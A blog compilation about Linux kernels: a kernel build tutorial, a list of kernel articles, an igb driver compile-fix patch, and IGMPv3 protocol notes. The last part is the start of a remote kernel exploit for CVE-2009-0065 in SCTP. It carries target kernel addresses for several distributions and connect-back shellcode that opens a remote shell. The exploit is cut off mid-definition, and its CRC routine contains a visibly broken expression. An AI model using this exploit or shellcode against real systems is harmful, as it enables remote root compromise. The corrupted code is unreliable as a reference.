Linux kernel, wifi hack, security & Golang

第一步 安装必要的工具

首先要安装必要的包。
包有：libncurses5-dev（menuconfig需要的）和essential

sudo apt-get install build-essential kernel-package
sudo apt-get install make
sudo apt-get install gcc

另外，查看系统是否有这样的两个命令

mkinitramfs mkisofs

这两个工具在编译内核时用来生成 *.img文件的。如果没有就需安装。

第二步 下载内核

到www.kernel.org下载新内核到/usr/src

wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.30.5.tar.bz2

我下载的是linux-2.6.30.5.tar.bz2(原来的内核是2.6.24-24-generic)

第三步 编译前的准备

察看当前内核的版本

border@ubuntu:/usr/src$ uname -a
Linux ubuntu 2.6.24-24-generic #1 SMP Tue Jun 30 20:28:53 UTC 2009 i686 GNU/Linux

建议最好下载比当前已安装版本高的内核

解压linux-2.6.30.5.tar.gz到linux-2.6.30.5

cd /usr/src
sudo tar xjvf linux-2.6.30.5.tar.bz2
cd linux-2.6.30.5/

第四步 开始编译

cd /usr/src/linux-2.6.30.5/ //以下所有的工作都在/usr/src/linux-2.6.30.5/下完成

sudo make menuconfig  //用menuconfig的话还需要Ncurses，或者用
sudo make xconfig
sudo make menuconfig  //一般是用menuconfig

配置完以后保存（系统中保存的一份内核配置文件是在/usr/src/linux-2.6.30.5下名为.config,你也可以自己在别的地方另存一份）
也可以cp原来在/boot目录下的config-2.6.xx 到当前目录下，在make menuconfig是使用这个配置文件。

sudo make clean //清除旧数据 ，新解压的内核源码就不需要这一步了
sudo make –j4 可以分四个线程来进行编译工作
sudo make bzImage //编译内核，将保存到/usr/src/linux-2.6.30.5/arch/i386/boot/下
sudo make modules //编译模块
sudo make modules_install //安装模块，执行完后会显示DEPMOD 2.6.30.5
sudo mkinitramfs -o /boot/initrd.img-2.6.30.5 2.6.30.5      // 2.6.30.5为modules_install 执行完成后显示的DEPMOD 2.6.30.5， 注意: 2.6.30.5 前面有空格
sudo make install //安装内核

如果你想把编译的结果打包为Deb包，可以参考这里 和 这里 .

sudo make-kpkg clean
sudo make-kpkg –revision eee701 kernel_image
sudo dpkg -i linux-image-2.6.30_eee701_i386.deb

安装完后/boot下将增加以下几个文件（用ls -l *30*查看）

border@ubuntu:/boot$ ls -l *30*
-rw-r–r– 1 root root   96237 2009-08-25 17:41 config-2.6.30.5
-rw-r–r– 1 root root 7896051 2009-08-25 17:38 initrd.img-2.6.30.5
-rw-r–r– 1 root root 1095789 2009-08-25 17:41 System.map-2.6.30.5
-rw-r–r– 1 root root 2324720 2009-08-25 17:41 vmlinuz-2.6.30.5

给/boot/grub/menu.lst中添加一个新的启动项，如我的menu.lst增加了如下一段文字

title           Ubuntu kernel 2.6.30.5
root            (hd0,0)
kernel          /boot/vmlinuz-2.6.30.5 vga=794 root=/dev/sda1 ro
initrd          /boot/initrd.img-2.6.30.5
quiet

ps: 上面在kernel一行后面的 “vga=794 root=/dev/sda1 ro” 是从你之前的启动项取得的。
重新启动即可。

参考:
1.   http://ubuntuforums.org/showthread.php?t=311158
2.   “creating a kernel 2.6.30 deb file” http://www.naumann.cc/?p=107

–
Bian Jiang
Blog:  http://www.wifihack.net/

Robert P. J. Day The Kernel Newbie Corner 系列文章

Robert can be reached at rpjday@crashcourse.ca This e-mail address is being protected from spambots. You need JavaScript enabled to view it , and can be followed at http://twitter.com/rpjday.

Last update: 2009.10.9

1. The Kernel Newbie Corner: Your First Loadable Kernel Module

2. The Kernel Newbie Corner: Your First Loadable Kernel Module, Part Deux

3. The Kernel Newbie Corner: Loadable Kernel Modules, Coming and Going

4. The Kernel Newbie Corner: Everything You Wanted to Know About Module Parameters

5. The Kernel Newbie Corner: Building and Running a New Kernel

6. The Kernel Newbie Corner: Kernel Symbols: What’s Available to Your Module, What Isn’t

7. The Kernel Newbie Corner: What’s in That Loadable Module, Anyway?

8. The Kernel Newbie Corner: Kernel and Module Debugging with gdb

9. The Kernel Newbie Corner: Kernel Debugging Using proc “Sequence” Files–Part 1

10. The Kernel Newbie Corner: Kernel Debugging with proc “Sequence” Files–Part 2

11. The Kernel Newbie Corner: Kernel Debugging with proc “Sequence” Files–Part 3

12. The Kernel Newbie Corner: “initrd” and “initramfs”–What’s Up With That?

13. The Kernel Newbie Corner: “initrd” and “initramfs”–Some Unfinished Business

The archive of all “Kernel Newbie Corner” http://linux.com/search/kernel%2Bnewbie%2Bcorner/%252F?ordering=oldest&searchphrase=exact&limit=20

想通过codeviz看linux kernel的调用关系, 但是codeviz用的是gcc-3.4.6,

但在用gcc-3.4.6编译linux-2.6.30的时候报错:

 drivers/net/igb/igb_main.c: In function `igb_up':
 drivers/net/igb/igb_main.c:130: sorry, unimplemented: inlining failed
 in call to 'igb_set_rah_pool': function body not available
 drivers/net/igb/igb_main.c:938: sorry, unimplemented: called from here
 drivers/net/igb/igb_main.c:133: sorry, unimplemented: inlining failed
 in call to 'igb_set_vmolr': function body not available
 drivers/net/igb/igb_main.c:939: sorry, unimplemented: called from here
 make[3]: *** [drivers/net/igb/igb_main.o] Error 1
 make[2]: *** [drivers/net/igb] Error 2
 make[1]: *** [drivers/net] Error 2
 make: *** [drivers] Error 2
 
 This is CentOS 4.x system.  While using same configuration to compile
 in CentOS 5.x systems with gcc-4.1.2 do not encounter such error and
 my guess is gcc version issue?  Any idea?

Linux-2.6.30 Linux-2.6.30.1使用gcc-3.4.6编译错误补丁:

diff --git a/drivers/net/igb/igb_main.c b/drivers/net/igb/igb_main.c
index be48029..adb09d3 100644
--- a/drivers/net/igb/igb_main.c
+++ b/drivers/net/igb/igb_main.c
@@ -127,14 +127,48 @@  static void igb_restore_vlan(struct igb_adapter *);
 static void igb_ping_all_vfs(struct igb_adapter *);
 static void igb_msg_task(struct igb_adapter *);
 static int igb_rcv_msg_from_vf(struct igb_adapter *, u32);
-static inline void igb_set_rah_pool(struct e1000_hw *, int , int);
 static void igb_set_mc_list_pools(struct igb_adapter *, int, u16);
 static void igb_vmm_control(struct igb_adapter *);
-static inline void igb_set_vmolr(struct e1000_hw *, int);
-static inline int igb_set_vf_rlpml(struct igb_adapter *, int, int);
 static int igb_set_vf_mac(struct igb_adapter *adapter, int, unsigned char *);
 static void igb_restore_vf_multicasts(struct igb_adapter *adapter);

+static inline void igb_set_vmolr(struct e1000_hw *hw, int vfn)
+{
+	u32 reg_data;
+
+	reg_data = rd32(E1000_VMOLR(vfn));
+	reg_data |= E1000_VMOLR_BAM |	 /* Accept broadcast */
+	            E1000_VMOLR_ROPE |   /* Accept packets matched in UTA */
+	            E1000_VMOLR_ROMPE |  /* Accept packets matched in MTA */
+	            E1000_VMOLR_AUPE |   /* Accept untagged packets */
+	            E1000_VMOLR_STRVLAN; /* Strip vlan tags */
+	wr32(E1000_VMOLR(vfn), reg_data);
+}
+
+static inline int igb_set_vf_rlpml(struct igb_adapter *adapter, int size,
+                                 int vfn)
+{
+	struct e1000_hw *hw = &adapter->hw;
+	u32 vmolr;
+
+	vmolr = rd32(E1000_VMOLR(vfn));
+	vmolr &= ~E1000_VMOLR_RLPML_MASK;
+	vmolr |= size | E1000_VMOLR_LPE;
+	wr32(E1000_VMOLR(vfn), vmolr);
+
+	return 0;
+}
+
+static inline void igb_set_rah_pool(struct e1000_hw *hw, int pool, int entry)
+{
+	u32 reg_data;
+
+	reg_data = rd32(E1000_RAH(entry));
+	reg_data &= ~E1000_RAH_POOL_MASK;
+	reg_data |= E1000_RAH_POOL_1 << pool;;
+	wr32(E1000_RAH(entry), reg_data);
+}
+
 #ifdef CONFIG_PM
 static int igb_suspend(struct pci_dev *, pm_message_t);
 static int igb_resume(struct pci_dev *);
@@ -5418,43 +5452,6 @@  static void igb_io_resume(struct pci_dev *pdev)
 	igb_get_hw_control(adapter);
 }

-static inline void igb_set_vmolr(struct e1000_hw *hw, int vfn)
-{
-	u32 reg_data;
-
-	reg_data = rd32(E1000_VMOLR(vfn));
-	reg_data |= E1000_VMOLR_BAM |	 /* Accept broadcast */
-	            E1000_VMOLR_ROPE |   /* Accept packets matched in UTA */
-	            E1000_VMOLR_ROMPE |  /* Accept packets matched in MTA */
-	            E1000_VMOLR_AUPE |   /* Accept untagged packets */
-	            E1000_VMOLR_STRVLAN; /* Strip vlan tags */
-	wr32(E1000_VMOLR(vfn), reg_data);
-}
-
-static inline int igb_set_vf_rlpml(struct igb_adapter *adapter, int size,
-                                 int vfn)
-{
-	struct e1000_hw *hw = &adapter->hw;
-	u32 vmolr;
-
-	vmolr = rd32(E1000_VMOLR(vfn));
-	vmolr &= ~E1000_VMOLR_RLPML_MASK;
-	vmolr |= size | E1000_VMOLR_LPE;
-	wr32(E1000_VMOLR(vfn), vmolr);
-
-	return 0;
-}
-
-static inline void igb_set_rah_pool(struct e1000_hw *hw, int pool, int entry)
-{
-	u32 reg_data;
-
-	reg_data = rd32(E1000_RAH(entry));
-	reg_data &= ~E1000_RAH_POOL_MASK;
-	reg_data |= E1000_RAH_POOL_1 << pool;;
-	wr32(E1000_RAH(entry), reg_data);
-}
-
 static void igb_set_mc_list_pools(struct igb_adapter *adapter,
 				  int entry_count, u16 total_rar_filters)
 {

参考:
1. linux-2.6.30.1 with gcc-3.4.6 compile error http://patchwork.kernel.org/patch/35402/
2. codeviz http://www.csn.ul.ie/~mel/projects/codeviz/

进来在作IGMP协议栈的解析，简单记录如下:

IGMPV3 Types

   There are two IGMP message types of concern to the IGMPv3 protocol
   described in this document:

      Type Number (hex)   Message Name
      -----------------   ------------

            0x11          Membership Query

            0x22          Version 3 Membership Report

   An implementation of IGMPv3 MUST also support the following three
   message types, for interoperation with previous versions of IGMP (see
   section 7):

           0x12          Version 1 Membership Report    [RFC-1112]

           0x16          Version 2 Membership Report    [RFC-2236]

IGMP V1 Query:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |Version| Type  |    Unused     |           Checksum            |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                         Group Address                         |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

IGMP V2 Query:

    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |      Type     | Max Resp Time |           Checksum            |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                         Group Address                         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

IGMP V3 Membership Query Message: :

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |  Type = 0x11  | Max Resp Code |           Checksum            |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                         Group Address                         |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      | Resv  |S| QRV |     QQIC      |     Number of Sources (N)     |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                       Source Address [1]                      |
      +-                                                             -+
      |                       Source Address [2]                      |
      +-                              .                              -+
      .                               .                               .
      .                               .                               .
      +-                                                             -+
      |                       Source Address [N]                      |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

 Version 3 Membership Report Message

   Version 3 Membership Reports are sent by IP systems to report (to
   neighboring routers) the current multicast reception state, or
   changes in the multicast reception state, of their interfaces.
   Reports have the following format:

RFC 3376                         IGMPv3                     October 2002

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |  Type = 0x22  |    Reserved   |           Checksum            |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |           Reserved            |  Number of Group Records (M)  |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      .                                                               .
      .                        Group Record [1]                       .
      .                                                               .
      |                                                               |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      .                                                               .
      .                        Group Record [2]                       .
      .                                                               .
      |                                                               |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                               .                               |
      .                               .                               .
      |                               .                               |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      .                                                               .
      .                        Group Record [M]                       .
      .                                                               .
      |                                                               |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   where each Group Record has the following internal format:

      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |  Record Type  |  Aux Data Len |     Number of Sources (N)     |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                       Multicast Address                       |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                       Source Address [1]                      |
      +-                                                             -+
      |                       Source Address [2]                      |
      +-                                                             -+
      .                               .                               .
      .                               .                               .
      .                               .                               .
      +-                                                             -+
      |                       Source Address [N]                      |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      .                                                               .
      .                         Auxiliary Data                        .
      .                                                               .
      |                                                               |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Example:
Version 3 Membership Report Message
 22 00 ea 03     | Type: 22, Checksum: ea 03
 00 00 00 01     | Number of group recode 01
 04 00 00 00     | Recode type: 04, Number of Sources: 00 00
 ef ff ff fa      | Multicast Addr: 239.255.255.250

 Group Record Types

   There are a number of different types of Group Records that may be
   included in a Report message:

   o A "Current-State Record" is sent by a system in response to a Query
     received on an interface.  It reports the current reception state
     of that interface, with respect to a single multicast address.  The
     Record Type of a Current-State Record may be one of the following
     two values:

        Value  Name and Meaning
        -----  ----------------

          1    MODE_IS_INCLUDE - indicates that the interface has a
               filter mode of INCLUDE for the specified multicast
               address.  The Source Address [i] fields in this Group
               Record contain the interface's source list for the
               specified multicast address, if it is non-empty.

          2    MODE_IS_EXCLUDE - indicates that the interface has a
               filter mode of EXCLUDE for the specified multicast
               address.  The Source Address [i] fields in this Group
               Record contain the interface's source list for the
               specified multicast address, if it is non-empty.

   o A "Filter-Mode-Change Record" is sent by a system whenever a local
     invocation of IPMulticastListen causes a change of the filter mode
     (i.e., a change from INCLUDE to EXCLUDE, or from EXCLUDE to
     INCLUDE), of the interface-level state entry for a particular
     multicast address.  The Record is included in a Report sent from
     the interface on which the change occurred.  The Record Type of a
     Filter-Mode-Change Record may be one of the following two values:

          3    CHANGE_TO_INCLUDE_MODE - indicates that the interface
               has changed to INCLUDE filter mode for the specified
               multicast address.  The Source Address [i] fields
               in this Group Record contain the interface's new
               source list for the specified multicast address,
               if it is non-empty.

          4    CHANGE_TO_EXCLUDE_MODE - indicates that the interface
               has changed to EXCLUDE filter mode for the specified
               multicast address.  The Source Address [i] fields
               in this Group Record contain the interface's new
               source list for the specified multicast address,
               if it is non-empty.

   o A "Source-List-Change Record" is sent by a system whenever a local
     invocation of IPMulticastListen causes a change of source list that
     is *not* coincident with a change of filter mode, of the
     interface-level state entry for a particular multicast address.
     The Record is included in a Report sent from the interface on which
     the change occurred.  The Record Type of a Source-List-Change
     Record may be one of the following two values:

          5    ALLOW_NEW_SOURCES - indicates that the Source Address
               [i] fields in this Group Record contain a list of the
               additional sources that the system wishes to
               hear from, for packets sent to the specified
               multicast address.  If the change was to an INCLUDE
               source list, these are the addresses that were added
               to the list; if the change was to an EXCLUDE source
               list, these are the addresses that were deleted from
               the list.

          6    BLOCK_OLD_SOURCES - indicates that the Source Address
               [i] fields in this Group Record contain a list of the
               sources that the system no longer wishes to
               hear from, for packets sent to the specified
               multicast address.  If the change was to an INCLUDE
               source list, these are the addresses that were
               deleted from  the list; if the change was to an
               EXCLUDE source list, these are the addresses that
               were added to the list.

   If a change of source list results in both allowing new sources and
   blocking old sources, then two Group Records are sent for the same
   multicast address, one of type ALLOW_NEW_SOURCES and one of type
   BLOCK_OLD_SOURCES.

IGMP Query



IGMP Report



图来自  Linux Networking Architecture 17.3.4 Implementing IGMP

参考:
1. IGMPV1 rfc1112
2. IGMPV2 rfc2236
3. IGMPV3 rfc3376
4. Linux下IGMP以及多播路由分析
5. Design and Implementation of IGMPv3 for Linux (2000)  
6. Linux Kernel 2.6.26
7. 在线查看Kernel: http://lxr.linux.no/linux+v2.6.26/
8.  RFC3376 因特网组管理协议 第3版(译)
9.  Linux Networking Architecture (Chapter 17. IP Multicast for Group Communication)
10. Mapping IP Multicast to MAC-Layer Multicast 

/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption
 * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit
 *
 * coded by: sgrakkyu <at> antifork.org
 * http://kernelbof.blogspot.com
 *
 *
 * NOTE: you need at least one sctp application bound on the target box
 *
 * Supported target:
 * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server)
 * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
 * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server)
 * Fedora Core 10 x86_64 (default installed kernel)
 * OpenSuse 11.1 x86_64  (default installed kernel)
 */

#define _GNU_SOURCE

#include <signal.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/sctp.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/time.h>
#include <sys/select.h>
#include <stdint.h>

#define __OFFSET_PORT_64 62 // 92
#define __OFFSET_HOST_64 64 // 94

//#define __TARGET_SPORT 20000

#ifndef __u8
#define __u8 uint8_t
#endif

#ifndef __u16
#define __u16 uint16_t
#endif

#ifndef __u32
#define __u32 uint32_t
#endif

/* start crc routines: ripped from wireshark sources */
#define SP_LEN 2
#define DP_LEN 2
#define VTAG_LEN 4
#define CHK_LEN 4
#define HEADER_LEN    (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN) 

#define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF])
static int32_t crc_c[256] =
{
0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L,
0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL,
0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL,
0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L,
0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL,
0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L,
0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L,
0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL,
0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL,
0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L,
0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L,
0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL,
0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L,
0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL,
0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL,
0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L,
0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L,
0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L,
0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L,
0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L,
0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L,
0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L,
0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L,
0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L,
0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L,
0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L,
0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L,
0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L,
0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L,
0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L,
0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L,
0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L,
0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL,
0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L,
0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L,
0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL,
0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L,
0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL,
0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL,
0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L,
0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L,
0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL,
0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL,
0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L,
0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL,
0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L,
0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L,
0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL,
0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L,
0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL,
0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL,
0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L,
0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL,
0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L,
0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L,
0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL,
0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL,
0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L,
0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L,
0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL,
0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L,
0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL,
0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL,
0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L,
};

static __u32 sctp_crc32c(const unsigned char* buf, __u32 len)
{
  __u32 i;
  __u32 crc32 = ~0U;
  __u32 r;
  unsigned char b0,b1,b2,b3;

  for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++)
  {
    CRC32C(crc32, buf[i]);
  }
  CRC32C(crc32, 0);
  CRC32C(crc32, 0);
  CRC32C(crc32, 0);
  CRC32C(crc32, 0);
  for (i = HEADER_LEN; i < len; i++)
  {
    CRC32C(crc32, buf[i]);
  }
  r = ~crc32;

  b0 = r & 0xff;
  b1 = (r>>8) & 0xff;
  b2 = (r>>16) & 0xff;
  b3 = (r>>24) & 0xff;
  crc32 = ((b0 << 24) | (b1 << 16) | (b2 <<  | b3);
  return ( crc32 );
}
/* end crc routines */

static char generic_x86_64_shellcode[] =
// prolog
"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb"
"\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80"
"\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0"
"\xb0\x60\x0f\x05\xc3"
// connect back
"\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58"
"\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f"
"\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a"
"\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48"
"\x31\xc0\xb0\xe7\x0f\x05\x90"
"\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75"
"\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48"
"\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48"
"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0"
"\xb0\xe7\x0f\x05"
;

static const char __zero[4] = {0x00, 0x00, 0x00, 0x00};
//static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41";

static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3";
static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90";

/* ubuntu 7.04 */
static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF";

/* ubuntu 8.04 */
static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] =    "\x00\x50\x62\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] =   "\x00\x40\x62\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] =   "\x00\x30\x62\x80\xFF\xFF\xFF\xFF";

static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] =  "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF"; 

/* ubuntu 8.10  */
static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] =  "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF";
static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] =  "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";   

static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] =  "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF";   

/* fedora code 10  */
static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF";
static char fedora64_10_default_kernel_x86_64_selinux[]     = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF";

/* opensuse 11.1 */
static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF";

#define __msg_f(format, args...) \
  do { fprintf(stdout, format, ## args); } while(0)

#define __msg(msg) \
  do { fprintf(stdout, "%s", msg); } while(0)

#define __fatal(msg) \
  do {fprintf(stderr, "%s", msg); exit(1);} while (0)

#define __fatal_perror(msg) \
  do { perror(msg); exit(1); } while (0)

enum {
  SLAB_ALLOCATOR=0,
  SLUB_ALLOCATOR=1
};

typedef struct
{
  const char *name;
  const char *info;
  char *scode;
  __u32 scodesize;
  __u32 portoff;
  __u32 hostoff;
  const char *vsysaddr;
  const char *vsysjump;
